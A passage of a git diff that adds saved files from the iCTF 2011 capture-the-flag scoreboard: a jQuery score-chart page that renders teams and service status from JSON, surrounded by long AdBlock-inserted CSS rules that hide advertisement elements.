oogleContentAds,.googleProfileAd,.googleSearchAd_content,.googleSearchAd_sidebar,.google_ad,.google_ad_wide,.google_add_container,.google_ads,.google_ads_bom_title,.google_ads_content,.google_adsense_footer,.googlead,.googleaddiv,.googleaddiv2,.googleads,.googleads_300x250,.googleads_title,.googleadsense,.googleafc,.googley_ads,.gpAdBox,.gpAds,.gradientAd,.grey-ad-line,.group_ad,.gsAd,.gsfAd,.gt_ad,.gt_ad_300x250,.gt_ad_728x90,.gt_adlabel,.gutter-ad-left,.gutter-ad-right,.gx_ad,.h-ad-728x90-bottom,.h_Ads,.h_ad,.half-ad,.half_ad_box,.hcf-ad,.hcf-ad-rectangle,.hcf-cms-ad,.hd_advert,.hdr-ads,.head_ad,.header-ad,.header-advert,.header-google-ads,.header-taxonomy-image-sponsor,.headerAd,.headerAdCode,.headerAds,.headerAdvert,.headerTextAd,.header_ad,.header_ad_center { display:none !important; } .header_ad_div,.header_ads,.header_advertisement,.header_advertisment,.headerad,.headerad-720,.hi5-ad,.highlightsAd,.hm_advertisment,.hn-ads,.home-ad-links,.homeAd,.homeAd1,.homeAd2,.homeAdBoxA,.homeAdBoxBetweenBlocks,.homeAdBoxInBignews,.homeAdSection,.homeMediumAdGroup,.home_ad_bottom,.home_advertisement,.home_advertorial,.home_mrec_ad,.homead,.homepage-ad,.homepage300ad,.homepageFlexAdOuter,.homepageMPU,.homepage_middle_right_ad,.homepageinline_adverts,.hor_ad,.horiz_adspace,.horizontalAd,.horizontal_ad,.horizontal_ads,.horizontaltextadbox,.horizsponsoredlinks,.hortad,.houseAd1,.houseAdsStyle,.housead,.hoverad,.hp-col4-ads,.hp2-adtag,.hp_ad_cont,.hp_ad_text,.hp_t_ad,.hp_w_ad,.hpa-ad1,.html-advertisement,.ic-ads,.ico-adv,.idMultiAd,.iframe-ad,.image-advertisement,.imageAd,.imageads,.imgad,.in-page-ad,.in-story-ads,.in-story-text-ad,.inStoryAd-news2,.indEntrySquareAd,.indie-sidead,.indy_googleads,.infoBoxThreadPageRankAds,.inhousead,.inline-ad,.inline-mpu,.inline-mpu-left,.inlineSideAd,.inline_ad,.inline_ad_title,.inlinead,.inlineadsense,.inlineadtitle,.inlist-ad,.inlistAd,.inner-advt-banner-3,.innerAds,.innerad,.inpostad,.insert_advertisement,.insertad,.insideStoryAd,.inteliusAd_image,.interest-based-ad,.internalAdsContainer,.iprom-ad,.is24-adplace,.isAd,.islandAd,.islandAdvert,.islandad,.itemAdvertise,.jimdoAdDisclaimer,.jp-advertisment-promotional,.js-advert,.kdads-empty,.kdads-link,.kw_advert,.kw_advert_pair,.l_ad_sub,.label-ad,.labelads,.largeRecAdNewsContainerRight,.largeRectangleAd,.largeUnitAd,.large_ad,.lastRowAd,.lazyload_ad,.lcontentbox_ad,.leadAd,.leaderAdSlot,.leaderAdTop,.leaderAdvert,.leaderBoardAdHolder,.leaderOverallAdArea,.leader_ad,.leaderboardAd,.leaderboardAdContainer,.leaderboardAdContainerInner,.leaderboard_ad,.leaderboardad,.leaderboardadtop,.left-ad,.left-advert,.leftAd,.leftAdColumn,.leftAds,.left_ad,.left_ad_box,.left_adlink,.left_ads,.left_adsense,.leftad,.leftadtag,.leftbar_ad_160_600,.leftbarads,.leftbottomads,.leftnavad,.lgRecAd,.lg_ad,.ligatus,.linead,.link_adslider,.link_advertise,.live-search-list-ad-container,.livingsocial-ad,.ljad,.local-ads,.log_ads,.logoAds,.logoad,.logoutAd,.longAd,.longAdBox,.lowerAds,.lr-ad,.m-ad-tvguide-box,.m4-adsbygoogle,.m_banner_ads,.macAd,.macad,.main-ad,.main-advert,.main-tabs-ad-block,.mainAd,.mainLeftAd,.mainLinkAd,.mainRightAd,.main_ad,.main_ad_bg_div,.main_adbox,.main_ads,.main_intro_ad,.map_media_banner_ad,.marginadsthin,.marketing-ad,.masthead_topad,.matador_sidebar_ad_600,.mdl-ad,.media-advert,.mediaAd,.mediaAdContainer,.mediaResult_sponsoredSearch,.medium-rectangle-ad,.mediumRectangleAdvert,.medium_ad,.medrect_ad,.member-ads,.menuItemBannerAd,.menueadimg,.messageBoardAd,.mf-ad300-container,.micro_ad,.mid_ad,.mid_page_ad,.midad,.middle-ad,.middleAds,.middlead,.middleads,.min_navi_ad,.mini-ad,.miniad,.miscAd,.mmc-ad,.mmcAd_Iframe,.mod-ad-lrec,.mod-ad-n,.mod-adopenx,.mod-vertical-ad,.mod_admodule,.module-ad,.module-ad-small,.module-ads,.module-advertisement,.module-sponsored-ads,.moduleAd,.moduleAdvertContent,.module_ad,.module_box_ad,.modulegad,.moduletable-advert,.moduletable-googleads,.moduletablesquaread,.mos-ad,.mpu-ad,.mpu-ad-con,.mpu-advert,.mpu-footer,.mpu-fp,.mpu-title,.mpu-top-left,.mpu-top-left-banner,.mpu-top-right,.mpu01,.mpuAd,.mpuAdSlot,.mpuAdvert,.mpuArea,.mpuBox,.mpuContainer,.mpuHolder,.mpuTextAd,.mpu_ad,.mpu_advert,.mpu_container,.mpu_gold,.mpu_holder,.mpu_platinum,.mpu_side,.mpu_text_ad,.mpuad,.mpuholderportalpage,.mrec_advert,.ms-ads-link,.msfg-shopping-mpu,.mvw_onPageAd1,.mwaads,.my-ad250x300,.nSponsoredLcContent,.nSponsoredLcTopic,.nadvt300,.narrow_ad_unit,.narrow_ads,.navAdsBanner,.navBads,.nav_ad,.navadbox,.navcommercial,.navi_ad300,.naviad,.nba300Ad,.nbaT3Ad160,.nbaTVPodAd,.nbaTwo130Ads,.nbc_ad_carousel_wrp,.newPex_forumads,.newTopAdContainer,.newad,.newsAd,.news_article_ad_google,.newsviewAdBoxInNews,.newsvinemsn_adtype,.nexusad,.nf-adbox,.nn-mpu,.noAdForLead,.normalAds,.nrAds,.nsAdRow,.nu2ad,.oas-ad,.oas-bottom-ads,.oas_ad,.oas_advertisement,.offer_sponsoredlinks,.oio-banner-zone,.oio-link-sidebar,.oio-zone-position,.on_single_ad_box,.onethirdadholder,.openads,.openadstext_after,.openx,.openx-ad,.openx_ad,.osan-ads,.other_adv2,.outermainadtd1,.ovAdPromo,.ovAdSky,.ovAdartikel,.ov_spns,.ovadsenselabel,.pageAds,.pageBottomGoogleAd,.pageGoogleAd,.pageGoogleAdFlat,.pageGoogleAdSubcontent,.pageGoogleAds,.pageGoogleAdsContainer,.pageLeaderAd,.page_content_right_ad,.pagead,.pageads,.pagenavindexcontentad,.paneladvert,.partner-ad,.partner-ads-container,.partnerAd,.partnersTextLinks,.pencil_ad,.player_ad_box,.player_hover_ad,.player_page_ad_box,.plista_inimg_box,.pm-ad,.pmad-in2,.pnp_ad,.pod-ad-300,.podRelatedAdLinksWidget,.podSponsoredLink,.portalCenterContentAdBottom,.portalCenterContentAdMiddle,.portalCenterContentAdTop,.portal_searchresultssponsoredlist,.portalcontentad,.post-ad,.postAd,.post_ad,.post_ads,.post_sponsor_unit,.postbit_adbit_register,.postbit_adcode,.postgroup-ads,.postgroup-ads-middle,.prebodyads,.premium_ad_container,.promoAd,.promoAds,.promo_ad,.promoboxAd,.promotionTextAd,.ps-ligatus_placeholder,.pub_300x250,.pub_300x250m,.pub_728x90,.publication-ad,.publicidad,.puff-advertorials,.qa_ad_left,.qm-ad-content,.qm-ad-content-news,.quigo-ad,.qzvAdDiv,.r_ad_1,.r_ad_box,.r_ads,.rad_container,.rect_ad_module,.rectad,.rectangle-ad,.rectangleAd,.rectanglead,.redads_cont,.referrerDetailAd,.regular_728_ad,.regularad,.relatedAds,.related_post_google_ad,.relatesearchad,.remads,.resourceImagetAd,.result_ad,.reviewMidAdvertAlign,.rght300x250,.rhads,.rhs-ad,.rhs-ads-panel,.rhs-advert-container,.rhs-advert-link,.rhs-advert-title,.right-ad,.right-ad-holder,.right-ad2,.right-ads,.right-ads2,.right-sidebar-box-ad,.rightAd,.rightAdBox,.rightAdverts,.rightColAd,.rightColumnRectAd,.rightRailAd,.right_ad,.right_ad_160,.right_ad_box,.right_ad_common_block,.right_ad_text,.right_ad_top,.right_ads,.right_ads_column,.right_box_ad_rotating_container,.right_col_ad,.right_hand_advert_column,.right_side-partyad,.rightad,.rightad_1,.rightad_2,.rightadbox1,.rightads,.rightadunit,.rightbigcolumn_ads,.rightbigcolumn_ads_nobackground,.rightcol_boxad,.rightcoladvert,.rightcoltowerad,.rightmenu_ad,.rnav_ad,.rngtAd,.rot_ads,.round_box_advert,.roundedCornersAd,.roundingrayboxads,.rt_ad1_300x90,.rt_ad_300x250,.rt_ad_call,.s2k_ad,.savvyad_unit,.sb-ad-sq-bg,.sbAd,.sbAdUnitContainer,.sb_ad_holder,.sb_adsN,.sb_adsNv2,.sb_adsW,.sb_adsWv2,.scanAd,.scc_advert,.sci-ad-main,.sci-ad-sub,.search-ad,.search-results-ad,.search-sponsor,.search-sponsored,.searchAd,.searchAdTop,.searchAds,.searchSponsoredResultsBox,.searchSponsoredResultsList,.search_column_results_sponsored,.search_results_sponsored_top,.section-ad2,.section_mpu_wrapper,.section_mpu_wrapper_wrapper,.selfServeAds,.sepContentAd,.serp_sponsored,.servsponserLinks,.shoppingGoogleAdSense,.showAd_No,.showAd_Yes,.showcaseAd,.sidbaread,.side-ad,.side-ads,.side-sky-banner-160,.sideAd,.sideBoxAd,.side_ad,.side_ad2,.side_ad_1,.side_ad_2,.side_ad_3,.sidead,.sideads,.sideadsbox,.sideadvert,.sidebar-ad,.sidebar-ads,.sidebar-content-ad,.sidebar-text-ad,.sidebarAd,.sidebarAdUnit,.sidebarAdvert,.sidebar_ad,.sidebar_ad_300_250,.sidebar_ads,.sidebar_ads_336,.sidebar_adsense,.sidebar_box_ad,.sidebarad,.sidebarad_bottom,.sidebaradbox,.sidebarads,.sidebarboxad,.sideheadnarrowad,.sideheadsponsorsad,.simple_ads_manager_widget,.single-google-ad,.singleAd,.singleAdsContainer,.single_ad,.singlead,.singleadstopcstm2,.site_ad_120_600,.site_ad_300x250,.sitesponsor,.skinAd,.skin_ad_638,.sky-ad,.skyAd,.skyAdd,.skyAdvert,.skyAdvert2,.sky_ad,.sky_scraper_ad,.skyad,.skyjobsadtext,.skyscraper-ad,.skyscraper_ad,.skyscraper_bannerAdHome,.sleekadbubble,.slideshow-ad,.slpBigSlimAdUnit,.slpSquareAdUnit,.sm_ad,.smallSkyAd1,.smallSkyAd2,.small_ad,.small_ads,.smallad-left,.smallads,.smallsponsorad,.smart_ads_bom_title,.spLinks,.specialAd175x90,.speedyads,.sphereAdContainer,.spl-ads,.spl_ad,.spl_ad2,.spl_ad_plus,.splitAd,.splitAdResultsPane,.sponlinkbox,.spons-link,.spons_links,.sponslink,.sponsor-ad,.sponsor-link,.sponsor-links,.sponsor-services,.sponsorPanel,.sponsorPost,.sponsorPostWrap,.sponsorStrip,.sponsor_ad_area,.sponsor_area,.sponsor_bar,.sponsor_columns,.sponsor_footer,.sponsor_line,.sponsor_links,.sponsor_logo,.sponsoradtitle,.sponsored-ads,.sponsored-chunk,.sponsored-editorial,.sponsored-features,.sponsored-links,.sponsored-links-alt-b,.sponsored-links-holder,.sponsored-links-right,.sponsored-post,.sponsored-post_ad,.sponsored-results,.sponsored-right-border,.sponsored-text,.sponsoredBox,.sponsoredInfo,.sponsoredInner,.sponsoredLabel,.sponsoredLink,.sponsoredLinks,.sponsoredLinks2,.sponsoredLinksHeader,.sponsoredProduct,.sponsoredResults,.sponsoredSideInner,.sponsored_ads,.sponsored_box,.sponsored_box_search,.sponsored_by,.sponsored_link,.sponsored_links,.sponsored_links_title_container,.sponsored_links_title_container_top,.sponsored_links_top,.sponsored_result,.sponsored_results,.sponsored_ss,.sponsored_well,.sponsoredibbox,.sponsoredlink,.sponsoredlinks,.sponsoredlinkscontainer,.sponsoredresults,.sponsoredtextlink_container_ovt,.sponsoring_link,.sponsorlink,.sponsorlink2,.sponsormsg,.sport-mpu-box,.spotlightAd,.squareAd,.square_ad,.square_banner_ad,.squared_ad,.ss-ad-banner,.ss-ad-mpu,.standard-ad,.start__newest__big_game_container_body_games_advertising,.staticAd,.stickyAdLink,.stock-ticker-ad-tag,.stocks-ad-tag,.store-ads,.story_AD,.story_ad_div,.story_right_adv,.storyad,.subad,.subadimg,.subcontent-ad,.subtitle-ad-container,.sugarad,.super-ad,.supercommentad_left,.supercommentad_right,.supp-ads,.supportAdItem,.surveyad,.t10ad,.tab_ad,.tab_ad_area,.tablebordersponsor,.tadsanzeige,.tadsbanner,.tadselement,.tallad,.tblTopAds,.tbl_ad,.tbox_ad,.td-Adholder,.td-TrafficWeatherWidgetAdGreyBrd,.teaser-sponsor,.teaserAdContainer,.teaser_adtiles,.teaser_advert_content,.text-ad,.text-ad-links,.text-ads,.text-advertisement,.text-g-advertisement,.text-g-group-short-rec-ad,.text-g-net-grp-google-ads-article-page,.textAd,.textAdBox,.textAds,.text_ad,.text_ads,.textad,.textadContainer,.textad_headline,.textadbox,.textadheadline,.textadlink,.textads,.textads_left,.textads_right,.textadsds,.textadsfoot,.textadtext,.textadtxt,.textadtxt2,.textlink-ads,.textlinkads,.tf_page_ad_search,.thirdage_ads_300x250,.thirdage_ads_728x90,.thisIsAd,.thisIsAnAd,.ticket-ad,.tileAds,.tips_advertisement,.title-ad,.title_adbig,.tncms-region-ads,.toolad,.toolbar-ad,.top-ad,.top-ad-space,.top-ads,.top-banner-ad,.top-left-nav-ad,.top-menu-ads,.topAd,.topAdWrap,.topAds,.topAdvertisement,.topAdverts,.topBannerAd,.topLeaderboardAd,.top_Ad,.top_ad,.top_ad1,.top_ad_728,.top_ad_728_90,.top_ad_disclaimer,.top_ad_div,.top_ad_post,.top_ad_wrapper,.top_ads,.top_advert,.top_advertisement,.top_advertising_lb,.top_bar_ad,.top_container_ad,.topad,.topad-bar,.topadbox,.topads,.topadspot,.topadvertisementsegment,.topboardads,.topcontentadvertisement,.topic_inad,.topstoriesad,.toptenAdBoxA,.tourFeatureAd,.tower-ad,.towerAd,.towerAdLeft,.towerAds,.tower_ad,.tower_ad_disclaimer,.towerad,.tr-ad-adtech-placement,.tribal-ad,.ts-ad_unit_bigbox,.ts-banner_ad,.ttlAdsensel,.tto-sponsored-element,.tucadtext,.tvs-mpu,.twoColumnAd,.twoadcoll,.twoadcolr,.tx_smartadserver_pi1,.txt-ads,.txtAd,.txtAds,.txt_ads,.txtadvertise,.type_adscontainer,.type_miniad,.type_promoads,.ukAds,.ukn-banner-ads,.under_ads,.undertimyads,.unit-ad,.universalboxADVBOX01,.universalboxADVBOX03,.universalboxADVBOX04a,.usenext,.v5rc_336x280ad,.vert-ads,.vert-adsBlock,.vertad,.vertical-adsense,.vidadtext,.videoAd,.videoBoxAd,.video_ad,.view-promo-mpu-right,.view_rig_ad,.virgin-mpu,.wa_adsbottom,.wantads,.weather_ad,.webads336x280,.wide-ad,.wide-advert,.wide-skyscraper-ad,.wideAd,.wideAdTable,.wide_ad,.wide_ad_unit_top,.wide_ads,.wide_google_ads,.widget-ad,.widget-ad-codes,.widget-ad300x250,.widget-entry-ads-160,.widgetYahooAds,.widget_ad,.widget_ad_boxes_widget,.widget_ad_rotator,.widget_adrotate_widgets,.widget_advert_widget,.widget_econaabachoadswidget,.widget_island_ad,.widget_maxbannerads,.widget_sdac_bottom_ad_widget,.widget_sdac_footer_ads_widget,.widget_sdac_skyscraper_ad_widget,.wikia-ad,.wikia_ad_placeholder,.wingadblock,.withAds,.wl-ad,.wnMultiAd,.wp125_write_ads_widget,.wp125ad,.wp125ad_2,.wpn_ad_content,.wrap-ads,.wrapper-ad,.wrapper-ad-sidecol,.wsSponsoredLinksRight,.wsTopSposoredLinks,.x03-adunit,.x04-adunit,.x81_ad_detail,.xads-blk-top-hld,.xads-blk2,.xads-ojedn,.y-ads,.y-ads-wide,.y7-advertisement,.yahoo-sponsored,.yahoo-sponsored-links,.yahooAd,.yahooAds,.yahoo_ads,.yahooad,.yahooad-image,.yahooad-urlline,.yan-sponsored,.ygrp-ad,.yom-ad,.youradhere,.yrail_ad_wrap,.yrail_ads,.ysmsponsor,.ysponsor,.yw-ad,.zRightAdNote,a[href*="/adrotate/adrotate-out.php?"],a[href^="http://ad-apac.doubleclick.net/"],a[href^="http://ad-emea.doubleclick.net/"],a[href^="http://ad.doubleclick.net/"],a[href^="http://ads.pheedo.com/"],a[href^="http://adserving.liveuniversenetwork.com/"],a[href^="http://api.ringtonematcher.com/"],a[href^="http://galleries.pinballpublishernetwork.com/"],a[href^="http://galleries.securewebsiteaccess.com/"],a[href^="http://install.securewebsiteaccess.com/"],a[href^="http://latestdownloads.net/download.php?"],a[href^="http://secure.signup-page.com/"],a[href^="http://secure.signup-way.com/"],a[href^="http://www.FriendlyDuck.com/AF_"],a[href^="http://www.adbrite.com/mb/commerce/purchase_form.php?"],a[href^="http://www.firstload.de/affiliate/"],a[href^="http://www.friendlyduck.com/AF_"],a[href^="http://www.google.com/aclk?"],a[href^="http://www.liutilities.com/aff"],a[href^="http://www.liutilities.com/products/campaigns/adv/"],a[href^="http://www.my-dirty-hobby.com/?sub="],a[href^="http://www.ringtonematcher.com/"],#mbEnd[cellspacing="0"][cellpadding="0"],#mclip_container:last-child,#ssmiwdiv[jsdisplay],#tads.c,#tadsb.c,#tadsto.c,.ch[onclick="ga(this,event)"],.ra[align="left"][width="30%"],.ra[align="right"][width="30%"],div[style="background:#fbf0fa;margin:0 0 14px;min-height:0;padding-top:2px;padding-bottom:1px;padding-right:8px;padding-left:7px"],#WerbungObenRechts10_GesamtDIV,#WerbungObenRechts8_GesamtDIV,#WerbungObenRechts9_GesamtDIV,#WerbungUntenLinks4_GesamtDIV,#WerbungUntenLinks7_GesamtDIV,#WerbungUntenLinks8_GesamtDIV,#WerbungUntenLinks9_GesamtDIV,#Werbung_Content,#Werbung_Sky,#Werbung_Wide,#__ligatus_placeholder__,#ad-bereich1-08,#ad-bereich1-superbanner,#ad-bereich2-08,#ad-bereich2-skyscrapper,#ad-rechts-block,#ad-rechts-sky,#ad_gross,#ad_lang,#ad_oben,#ad_rechts,#adbox_artikel,#adkontainer,#anzeigewerbungtext,#ar_detail_werb103,#bannerwerbung,#callya_freikarte_layer,#cnt_bgwerbung,#cont-werb,#forumformwerbung,#freikarte_layer,#gonamicerror,#header_werbung,#headerwerbung,#kaufDA,#kaufDA-widget-container,#kopf-werbung,#lieferando-widget-container,#moveable_werbung,#p-links-werbung,#p-rechts-werbung,#qm_content_ad_anzeige,#reklame,#startwerbung,#t_werbung,#textwerbung,#topwerbung,#werbLayer1,#werbLayer2,#werbLayer3,#werb_ps103,#werbeadd,#werbebalken_slot,#werbebanner,#werbeblock,#werbebox,#werbebox_contentad,#werbecontainer_content,#werbecontainer_sky,#werbeflaeche,#werbetrenner,#werbung,#werbung-left,#werbung-skyscraper,#werbung1,#werbung2,#werbung3,#werbung792_2,#werbungSuperbanner,#werbung_bigsize,#werbung_footer,#werbung_mitte,#werbung_rechts,#werbung_right,#werbung_top,#werbunglink,#werbungrechts,#werbungsky,#wkr_werbung,.Artikel_Ads_News,.KomischeWerbeBox,.RessortWerbungHeader,.Werbeteaser,.Werbung,.WerbungAdpepper { display:none !important; } .WerbungDetailRectangle,.WerbungLinksRechts,.WerbungMitte,.ad_mitte,.ads_rechts,.adzeiger,.anzeigenwerbung,.bannerAnzeige,.bdeFotoGalAd,.bdeFotoGalAdText,.big-werb,.block_rs4_werbung,.bottom-werbung-box,.box_werbung_detailseite,.boxstartwerbung,.boxwerb,.boxwerbung,.content_body_right_werbung,.content_header_werbung,.content_right_side_werbewrapper,.contentwerbung4,.ecom_werbung,.firstload,.fullbanner_werbung,.gutZuWissenAd,.insidewerbung,.lokalwerbung,.rahmen_ad,.reklame,.right-content-werbung,.seitenleiste_werbung,.sponsorinaktiv,.sponsorlinkgruen,.tab_artikelwerbung,.teaser_adliste,.text_werbung,.textad_hauptlink,.topwerbung,.werbeadd_ueber,.werbebanner,.werbeflaeche,.werbung,.werbung-bigbox,.werbung-bigsize,.werbung-content,.werbung-contentad,.werbung-fullbanner,.werbung-halfbanner,.werbung-label,.werbung-leiste,.werbung-rectangle,.werbung-skyscraper,.werbung-skyscraper2,.werbung1,.werbung2,.werbung3,.werbung300,.werbung301,.werbungAnzeige,.werbungTabelle,.werbung_bereich,.werbungamazon,a[href^="http://farm.plista.com/pets"],a[href^="http://shortnews.de/gotoklick.cfm?fr_campaign_adtext_id="],a[href^="http://www.eis.de/index.phtml?refid="],a[href^="http://www.firstload.de/index.php?set_lang=de&log="],a[href^="http://www.top-of-software.de/"],a[href^="https://farm.plista.com/pets"],input[onclick^="window.open('http://www.firstload.de/affiliate/"] { display:none !important; }</style></html> +\ No newline at end of file diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/score-chart.html b/ictf2011/scoreboard.ictf2011_end.info_files/score-chart.html @@ -0,0 +1,204 @@ +<!DOCTYPE html> +<!-- saved from url=(0048)http://scoreboard.ictf2011.info/score-chart.html --> +<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> + +<title>iCTF 2011 Score Chart</title> + +<style type="text/css"> +body {background-color:#131a22; +font-family:monospace; +} +</style> +<script type="text/javascript" src="jquery.min.js"></script> +<script type="text/javascript" src="jquery.tablesorter.min.js"></script> + +<script type="text/javascript"> + +function UpdateList(tableId) +{ + $.getJSON("json/score_chart.json",function(data) + { + var first = 0; + var sortList = []; + if(data.Error) + { + var table_data = "<thead class='score_table_head'><tr><td>"+data.Error+"</td></tr></thead>"; + $(table_data).appendTo(tableId); + return; + } + h = $('.score_table_head'); + if(h.length == 0) + { + first = 1; + var table_head = "<thead class='score_table_head'><tr>" + $.each(data.header, function(i,h) + { + if(h.length > 7) + { + table_head +="<th title=\""+h+"\">"+h.substring(0,6)+"..</th>"; + }else + { + table_head +="<th title=\""+h+"\">"+h+"</th>"; + } + }); + table_head += "</tr></thead>" + + $(table_head).appendTo(tableId); + }else + { + var x = h.find("th"); + for(var i =0;i<x.length;i++) + { + hr = x[i]; + if(hr.className == "header headerSortDown") + { sortList = [i,0]; } + if(hr.className == "header headerSortUp") + { sortList = [i,1]; } + } + } + + $('tbody').remove('.score_table_body'); + + var table_body = "<tbody class='score_table_body'>" + var classAlt = ["d0","d1"]; + var i=0; + $.each(data.rows, function(i,rows) + { + table_body += "<tr class="+classAlt[i++%2]+">"; + $.each(rows,function(i,r) + { + if(i==1) + { + table_body +="<td ><img width=\"20px\" height==\"20px\" src=\""+r.logo_url+"\"><b> "+r.name+" </b></td>"; + }else if(i==2) + { + if(!r) r="X"; + table_body +="<td>"+r+" <img src=\"http://maliciousnetworks.org/flag_icons/png/"+r.toLowerCase()+".png\"></td>"; + }else if(i==3) + { + table_body +="<td><b>"+r+"</b></td>"; + }else if(i>=5) + { + //active + if(r[0]==1) + { + table_body += "<td> <img src=\"img/on.gif\" width = \"10px\" alt = \"Active\" title = \"Active\">"; + //compromised + if(r[1]==1) + { + table_body += "<img src=\"img/broken.png\" width = \"10px\" alt = \"Service Compromised!\" title = \"Service Compromised!\">"; + }else + { + table_body += "<img src=\"img/locked.png\" width = \"10px\" alt = \"Secure\" title = \"Secure\">"; + } + + }else + { + table_body += "<td> <img src=\"img/off.gif\" width = \"10px\" title = \"Service Down!\" alt = \"Service Down!\">"; + } + + table_body += "</td>"; + + }else + { + table_body +="<td>"+r+"</td>"; + } + }); + table_body += "</tr>"; + }); + table_body += "</tbody>"; + $(table_body).appendTo(tableId); + if(first==1) + { + console.log('new'); + $("#scoretable").tablesorter(); + }else + { + $("#scoretable").trigger("update"); + if(sortList.length >0) + { + //$("#scoretable").trigger("sorton",[[sortList,[0,0]]]); + } + } + }); +} + +$(document).ready(function() +{ + UpdateList("#scoretable"); + setInterval("UpdateList(\"#scoretable\")", 30000); +}); + +</script> + +<style type="text/css"> + +table tr:last-child td:first-child { +-moz-border-radius-bottomleft:15px; +-webkit-border-bottom-left-radius:15px; +border-bottom-left-radius:15px} + +table tr:last-child td:last-child { + -moz-border-radius-bottomright:15px; + -webkit-border-bottom-right-radius:15px; + border-bottom-right-radius:15px} + +table tr:first-child th:first-child { +-moz-border-radius-topleft:15px; +-webkit-border-top-left-radius:15px; +border-top-left-radius:15px} + +table tr:first-child th:last-child { + -moz-border-radius-topright:15px; + -webkit-border-top-right-radius:15px; + border-top-right-radius:15px} + +table.tablesorter { + color:#7494D6; + font-family:arial; + font-size: 12pt; + width: 100%; + text-align: left; + border-collapse: collapse; +} +table.tablesorter thead tr th, table.tablesorter tfoot tr th { + background-color: #28344E; + font-size: 12pt; + padding: 8px; +} +table.tablesorter thead tr .header { + background-image: url(img/bg.gif); + background-repeat: no-repeat; + background-position: center right; + cursor: pointer; +} +table.tablesorter tbody td { + color: #9BBFE9; + padding: 5px; + background-color: #3C527F; + vertical-align: top; +} +table.tablesorter tbody tr.d0 td { + background-color:#34456B; +} +table.tablesorter thead tr .headerSortUp { + background-image: url(img/asc.gif); +} +table.tablesorter thead tr .headerSortDown { + background-image: url(img/desc.gif); +} +table.tablesorter thead tr .headerSortDown, table.tablesorter thead tr .headerSortUp { + background-color: #455D8E; +} +</style> + +</head><style type="text/css" style="display: none !important; ">/*This block of style rules is inserted by AdBlock*/#FFN_Banner_Holder,#FFN_imBox_Container,#RadAd_Skyscraper,#ab_pointer,#adxLeaderboard,#bbccom_leaderboard,#center_banner,#dir_ads_site,#flashad,#footer_adcode,#hbBHeaderSpon,#hiddenHeaderSpon,#navbar_adcode,#p360-format-box,#rightAds,#rightcolumn_adcode,#rm_container,#tads table[align="center"][width="100%"],#tooltipbox[class^="itxt"],#top-advertising,#topMPU,#tracker_advertorial,#ve_threesixty_swf[name="ve_threesixty_swf"],.ad-now,.ad_marquee,.dfpad,.kLink span[id^="preLoadWrap"].preLoadWrap,.prWrap,[id^="ad_block"],[id^="adbrite"],[id^="dclkAds"],[id^="ew"][id$="_bannerDiv"],[id^="konaLayer"],[src*="sixsigmatraffic.com"],a[href^="http://ad."][href*=".doubleclick.net/"],a[href^="http://adserver.adpredictive.com"],div[class^="dms_ad_IDS"],div[id^="adKontekst_"],div[id^="google_ads_div"],div[id^="kona_"][id$="_wrapper"],div[id^="sponsorads"],div[id^="y5_direct"],embed[flashvars*="AdID"],iframe[id^="dapIfM"],iframe[id^="etarget"][id$="banner"],iframe[name^="AdBrite"],iframe[name^="google_ads_"],img[src^="http://cdn.adnxs.com"],script[src="//pagead2.googleadservices.com/pagead/show_ads.js"] + ins > ins > iframe,script[src="http://pagead2.googlesyndication.com/pagead/show_ads.js"] + ins > ins > iframe,table[cellpadding="0"][width="100%"] > * > * > * > div[id^="tpa"],#A9AdsMiddleBoxTop,#A9AdsOutOfStockWidgetTop,#A9AdsServicesWidgetTop,#ADNETwallBanner1,#ADNETwallBanner2,#ADSLOT_1,#ADSLOT_2,#ADSLOT_3,#ADSLOT_4,#ADSLOT_SKYSCRAPER,#ADVERTISE_HERE_ROW,#AD_CONTROL_22,#AD_CONTROL_28,#AD_CONTROL_29,#AD_CONTROL_8,#AD_ROW,#AD_Top,#AD_newsblock,#ADgoogle_newsblock,#ADsmallWrapper,#Ad160x600,#Ad300x250,#Ad3Left,#Ad3Right,#Ad3TextAd,#AdArea,#AdBanner_F1,#AdBar,#AdBar1,#AdBox2,#AdContainer,#AdContainerTop,#AdContentModule_F,#AdDetails_GoogleLinksBottom,#AdDetails_InsureWith,#AdFrame4,#AdHeader,#AdLeaderboardBottom,#AdLeaderboardTop,#AdMiddle,#AdMobileLink,#AdPopUp,#AdRectangle,#AdSenseDiv,#AdSenseResults1_adSenseSponsorDiv,#AdServer,#AdShowcase_F1,#AdSky23,#AdSkyscraper,#AdSpacing,#AdSponsor_SF,#AdSubsectionShowcase_F1,#AdTargetControl1_iframe,#AdTop,#AdTopLeader,#Ad_BelowContent,#Ad_Block,#Ad_Center1,#Ad_Right1,#Ad_RightBottom,#Ad_RightTop,#Ad_Top,#Adbanner,#Adrectangle,#AdsContent,#AdsRight,#AdsWrap,#Ads_BA_CAD,#Ads_BA_CAD2,#Ads_BA_CAD_box,#Ads_BA_SKY,#Ads_CAD,#Ads_OV_BS,#Ads_Special,#AdvertMPU23b,#AdvertPanel,#AdvertiseFrame,#Advertisement,#Advertisements,#Advertorial,#Advertorials,#AdvertsBottom,#AdvertsBottomR,#BANNER_160x600,#BANNER_300x250,#BANNER_728x90,#BannerAd,#BannerAdvert,#BigBoxAd,#BodyAd,#BotAd,#Bottom468x60AD,#ButtonAd,#ClickPop_LayerPop_Container,#CompanyDetailsNarrowGoogleAdsPresentationControl,#CompanyDetailsWideGoogleAdsPresentationControl,#ContentAd,#ContentAd1,#ContentAd2,#ContentAdPlaceHolder1,#ContentAdPlaceHolder2,#ContentAdXXL,#ContentPolepositionAds_Result,#CornerAd,#DartAd300x250,#DivAdEggHeadCafeTopBanner,#FIN_videoplayer_300x250ad,#FooterAd,#FooterAdContainer,#GOOGLE_ADS_47,#GoogleAd1,#GoogleAd2,#GoogleAd3,#GoogleAdsPlaceHolder,#GoogleAdsPresentationControl,#GoogleAdsense,#Google_Adsense_Main,#HEADERAD,#HOME_TOP_RIGHT_BOXAD,#HeaderAD,#HeaderAdsBlock,#HeaderAdsBlockFront,#HeaderBannerAdSpacer,#HeaderTextAd,#HeroAd,#HomeAd1,#HouseAd,#ID_Ad_Sky,#JobsearchResultsAds,#Journal_Ad_125,#Journal_Ad_300,#JuxtapozAds,#KH-contentAd,#LargeRectangleAd,#LeftAd,#LeftAd1,#LeftAdF1,#LeftAdF2,#LftAd,#LoungeAdsDiv,#LowerContentAd,#MPUAdSpace,#MainSponsoredLinks,#Meebo\:AdElement\.Root,#Nightly_adContainer,#NormalAdModule,#OpenXAds,#OverrideAdArea,#PREFOOTER_LEFT_BOXAD,#PREFOOTER_RIGHT_BOXAD,#